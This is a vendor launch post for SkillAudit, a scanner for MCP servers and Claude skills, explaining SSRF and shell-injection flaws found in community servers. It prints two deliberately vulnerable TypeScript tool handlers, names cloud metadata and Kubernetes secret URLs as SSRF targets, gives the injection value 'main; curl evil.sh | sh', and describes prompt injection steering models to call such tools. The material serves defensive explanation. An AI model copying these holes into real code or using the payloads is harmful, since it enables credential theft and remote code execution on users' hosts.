Launch post · 2026-04-23

Why 36.7% of community MCP servers fail a basic SSRF check

A public 2026 scan of community Model Context Protocol servers found SSRF in more than a third of them and unsafe command execution in 43%. Here is what that actually looks like in code, why existing dependency scanners miss it, and why we built SkillAudit to change the signal.

The context nobody set up

Model Context Protocol went from a published spec to a community with more than 8,000 servers indexed across a dozen registries in under a year. Claude skills followed the same curve. Each server is not just a library — it is a bundle of capability your agent inherits at install time: tools it can call, files it can read, endpoints it can hit, shells it can open. "I ran claude plugin install" is today's equivalent of "I ran curl | sh" from some repo you found on Twitter.

The supply-chain problem was imported into LLM tooling before anyone shipped a scanner. Anthropic's own official skills directory now requires a security review before listing, and that is a floor, not a ceiling. The vast majority of MCP servers and Claude skills are published elsewhere — on awesome-mcp lists, on npm, on indie registries. There is no neutral, fast, reproducible audit a skill author can run against their own repo before shipping, and no automatic gate a team lead can enforce before adoption.

So we went back and read the public scan data.

What "36.7% SSRF" actually means

Server-side request forgery, in one line: the server fetches a URL that an untrusted caller controls, and the fetch reaches resources the caller was never supposed to reach. In a web app it is usually how attackers pivot into the cloud metadata service and steal IAM credentials. In an MCP server, it is the same vulnerability class — except the "untrusted caller" is the LLM itself, and the LLM's input is driven by whatever prompt-injected content ended up in the chat window.

Concretely, the pattern looks like this:

// ssrf-primitive.ts — a tool that ships in more than one in three
// community MCP servers we sampled.
server.addTool({
  name: "get_url_content",
  description: "Fetch the content of a URL.",
  parameters: { url: { type: "string" } },
  handler: async ({ url }) => {
    const res = await fetch(url);                 // <-- no validation
    return await res.text();
  },
});

That tool looks benign and sometimes useful. It is also a working primitive for: hitting http://169.254.169.254/latest/meta-data/iam/security-credentials/ on an EC2 host and returning the AWS role credentials; hitting http://kubernetes.default.svc/api/v1/namespaces/kube-system/secrets from a pod and returning cluster secrets; hitting http://localhost:6379/ or http://internal-db:5432/ and probing internal services that were never meant to face the outside world.

The model does not need to be "jailbroken" to call this tool against the metadata endpoint — it just needs a user message that looks like "please fetch the contents of that url for me," or a README it was asked to summarize that contains a hostile instruction. Prompt injection is the universal trigger. The vulnerability was always in the tool surface.

What "43% unsafe command-exec" actually means

The other half of the public scan's finding was even more direct: 43% of sampled servers exposed a tool that eventually feeds caller-controlled input into child_process.exec, subprocess.run(..., shell=True), os.system, backticks in Ruby, or the equivalent in Go. The canonical shape:

// rce-primitive.ts — a convenience "git" tool, reprinted in dozens of
// community servers with no input escaping.
server.addTool({
  name: "git_log",
  description: "Get the git log for a branch.",
  parameters: { branch: { type: "string" } },
  handler: async ({ branch }) => {
    const { stdout } = await exec(`git log ${branch}`);  // <-- shell injection
    return stdout;
  },
});

A branch name of main; curl evil.sh | sh is a working remote-code-execution primitive against any host that installs this skill. There is no safe model-level defense. System-prompt instructions like "never run destructive commands" are not security controls — they are a polite request. Prompt injection can override them with high reliability in every model we tested in 2026, and in production you must assume the model is compromised. The MCP server is the real perimeter, and 43% of community servers have a hole in it.

Why Snyk and Dependabot miss this

We build SkillAudit because existing scanners are solving a different problem. Snyk, Dependabot, OSV-Scanner, Trivy, and every generic SAST tool we evaluated have three blind spots that together make them the wrong tool for this ecosystem:

No model of the tool surface. These scanners look at your dependency tree and sometimes your code for known-CVE signatures. They do not model the fact that every MCP tool definition is, effectively, a remote-call endpoint that an attacker can trigger through the model. A tool exposing fetch(url) with no allow-list is not a "vulnerability" to a tree-scanner — it is just a function call. In an MCP context, it is the vulnerability.
No semantic understanding of the prompt surface. A Claude skill's README and tool descriptions are not docs — they are part of the attack surface. The model reads them. Prompt-injection payloads routinely live in tool descriptions, in default prompts, or in metadata embedded in files the tool is asked to summarize. Generic scanners do not read English for adversarial intent.
No cross-client compatibility signal. The same skill behaves differently under Claude Code, Cursor, Windsurf, and Codex CLI. A tool schema that silently breaks on Cursor's stricter validator looks fine to every dependency scanner and is the reason half the "it works on my machine" bug reports exist. Compatibility is a review axis, not a side effect.

The answer is not "more scanners." The answer is a scanner that was designed for this stack.

The six axes of SkillAudit

SkillAudit takes a GitHub URL — or an npm package name, or an uploaded ZIP — of any Claude skill or MCP server and returns a graded report card across six axes in roughly 60 seconds:

Security. Static detection of SSRF and command-exec primitives, plus an LLM-assisted prompt-injection red team against the exposed tool surface. The first two categories are where the public scan found the 36.7% and 43%. The third is where new exploits arrive.
Permissions hygiene. Does the skill ask for scopes it does not use? File system access it never exercises? Network reach beyond its documented endpoints? Over-provisioning is the silent failure mode — it does not crash, it just quietly widens the blast radius.
Credential exposure. Env vars echoed into logs, tokens written to temp files, OAuth tokens returned to the model in tool outputs. These are the supply-chain leaks that get weaponized weeks after install, when a separate vuln gives an attacker access to one of the many places the credential leaked to.
Maintenance signal. Last commit date, open issue age, advisory-feed responsiveness. A skill that has not been touched in 18 months is a security liability regardless of current grade; the grade does not age well.
Cross-client compatibility. Does the tool schema pass Claude Code, Cursor, Windsurf, and Codex CLI validators? We run the schemas against each client's current validator and report compat explicitly, so a Cursor-only quirk is not misreported as a Claude bug.
Documentation completeness. Is there a runnable example? Is there a versioned schema? Does the README actually match what the tools do? Docs gaps correlate with review gaps correlate with vuln likelihood — this axis is a proxy for "does the author think like someone who will be audited?"

Each axis grades A / B / C / warn / fail with an explanation and, where applicable, a remediation hint. The report is public by default — you can embed a badge in your README the same way you embed a Snyk or codecov badge — and a private deep report is available on Pro.

What is live today

The landing page, the waitlist, the methodology, and the public-scan reference data are live today at skillaudit.dev. The audit engine itself is in build: the static parse and the LLM-assisted probe are implemented behind a feature flag and being hardened against the first batch of real repos before we open scans to the public. The first 100 free audits go to waitlist signups in the order they joined.

This is a build-in-public launch. We will be transparent about what works and what does not: you will see the engine tighten in weekly blog posts, and you will see the grade distribution across the first 100 scans published as a follow-up to this post. Nothing about the numbers will be smoothed.

The ask

If you publish a Claude skill or MCP server — or if you run a team that installs them — join the waitlist at skillaudit.dev. If you have a specific MCP server you want scanned first (yours, or one you are about to install and do not trust), email it to hello@skillaudit.dev with "scan first" in the subject. We are building the ground-truth dataset in public, and your most-feared MCP server is exactly the shape of repo the engine is being trained on first.

The stat that opens this post — 36.7% SSRF, 43% command-exec — is a floor, not a ceiling. It came from a static scan of a sample. The actual number is probably worse once you include prompt-injection surface, credential leakage in logs, and schemas that silently break across clients. Trust should not depend on whoever happened to star a repo on GitHub. We are building the signal that does not.

Written by the SkillAudit team. Public 2026 MCP-server scan figures cited from community reporting at developersdigest.tech, effloow.com, and apigene.ai. If you have corrections or additional scan data, please email hello@skillaudit.dev — we will update this post and credit sources.

Ready to audit your skill before you ship?

Audit your repo →